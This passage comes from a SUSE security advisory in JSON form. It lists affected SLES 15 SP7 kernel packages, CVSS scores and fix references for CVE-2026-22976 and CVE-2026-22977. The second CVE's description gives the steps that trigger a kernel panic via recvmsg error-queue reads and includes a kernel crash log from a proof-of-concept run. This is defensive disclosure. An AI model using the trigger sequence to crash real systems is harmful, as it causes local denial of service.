"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22976",
"url": "https://www.suse.com/security/cve/CVE-2026-22976"
},
{
"category": "external",
"summary": "SUSE Bug 1257035 for CVE-2026-22976",
"url": "https://bugzilla.suse.com/1257035"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2026-22976"
},
{
"cve": "CVE-2026-22977",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22977"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: sock: fix hardened usercopy panic in sock_recv_errqueue\n\nskbuff_fclone_cache was created without defining a usercopy region,\n[1] unlike skbuff_head_cache which properly whitelists the cb[] field.\n[2] This causes a usercopy BUG() when CONFIG_HARDENED_USERCOPY is\nenabled and the kernel attempts to copy sk_buff.cb data to userspace\nvia sock_recv_errqueue() -\u003e put_cmsg().\n\nThe crash occurs when: 1. TCP allocates an skb using alloc_skb_fclone()\n (from skbuff_fclone_cache) [1]\n2. The skb is cloned via skb_clone() using the pre-allocated fclone\n[3] 3. The cloned skb is queued to sk_error_queue for timestamp\nreporting 4. Userspace reads the error queue via recvmsg(MSG_ERRQUEUE)\n5. sock_recv_errqueue() calls put_cmsg() to copy serr-\u003eee from skb-\u003ecb\n[4] 6. __check_heap_object() fails because skbuff_fclone_cache has no\n usercopy whitelist [5]\n\nWhen cloned skbs allocated from skbuff_fclone_cache are used in the\nsocket error queue, accessing the sock_exterr_skb structure in skb-\u003ecb\nvia put_cmsg() triggers a usercopy hardening violation:\n\n[ 5.379589] usercopy: Kernel memory exposure attempt detected from SLUB object \u0027skbuff_fclone_cache\u0027 (offset 296, size 16)!\n[ 5.382796] kernel BUG at mm/usercopy.c:102!\n[ 5.383923] Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\n[ 5.384903] CPU: 1 UID: 0 PID: 138 Comm: poc_put_cmsg Not tainted 6.12.57 #7\n[ 5.384903] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014\n[ 5.384903] RIP: 0010:usercopy_abort+0x6c/0x80\n[ 5.384903] Code: 1a 86 51 48 c7 c2 40 15 1a 86 41 52 48 c7 c7 c0 15 1a 86 48 0f 45 d6 48 c7 c6 80 15 1a 86 48 89 c1 49 0f 45 f3 e8 84 27 88 ff \u003c0f\u003e 0b 490\n[ 5.384903] RSP: 0018:ffffc900006f77a8 EFLAGS: 00010246\n[ 5.384903] RAX: 000000000000006f RBX: ffff88800f0ad2a8 RCX: 1ffffffff0f72e74\n[ 5.384903] RDX: 0000000000000000 RSI: 0000000000000004 RDI: ffffffff87b973a0\n[ 5.384903] RBP: 0000000000000010 R08: 0000000000000000 R09: fffffbfff0f72e74\n[ 5.384903] R10: 0000000000000003 R11: 79706f6372657375 R12: 0000000000000001\n[ 5.384903] R13: ffff88800f0ad2b8 R14: ffffea00003c2b40 R15: ffffea00003c2b00\n[ 5.384903] FS: 0000000011bc4380(0000) GS:ffff8880bf100000(0000) knlGS:0000000000000000\n[ 5.384903] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 5.384903] CR2: 000056aa3b8e5fe4 CR3: 000000000ea26004 CR4: 0000000000770ef0\n[ 5.384903] PKRU: 55555554\n[ 5.384903] Call Trace:\n[ 5.384903] \u003cTASK\u003e\n[ 5.384903] __check_heap_object+0x9a/0xd0\n[ 5.384903] __check_object_size+0x46c/0x690\n[ 5.384903] put_cmsg+0x129/0x5e0\n[ 5.384903] sock_recv_errqueue+0x22f/0x380\n[ 5.384903] tls_sw_recvmsg+0x7ed/0x1960\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 5.384903] ? schedule+0x6d/0x270\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 5.384903] ? mutex_unlock+0x81/0xd0\n[ 5.384903] ? __pfx_mutex_unlock+0x10/0x10\n[ 5.384903] ? __pfx_tls_sw_recvmsg+0x10/0x10\n[ 5.384903] ? _raw_spin_lock_irqsave+0x8f/0xf0\n[ 5.384903] ? _raw_read_unlock_irqrestore+0x20/0x40\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n\nThe crash offset 296 corresponds to skb2-\u003ecb within skbuff_fclones:\n - sizeof(struct sk_buff) = 232 - offsetof(struct sk_buff, cb) = 40 -\n offset of skb2.cb in fclones = 232 + 40 = 272 - crash offset 296 =\n 272 + 24 (inside sock_exterr_skb.ee)\n\nThis patch uses a local stack variable as a bounce buffer to avoid the hardened usercopy check failure.\n\n[1] https://elixir.bootlin.com/linux/v6.12.62/source/net/ipv4/tcp.c#L885\n[2] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5104\n[3] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5566\n[4] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5491\n[5] https://elixir.bootlin.com/linux/v6.12.62/source/mm/slub.c#L5719",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22977",
"url": "https://www.suse.com/security/cve/CVE-2026-22977"
},
{
"category": "external",
"summary": "SUSE Bug 1257053 for CVE-2026-22977",
"url": "https://bugzilla.suse.com/1257053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
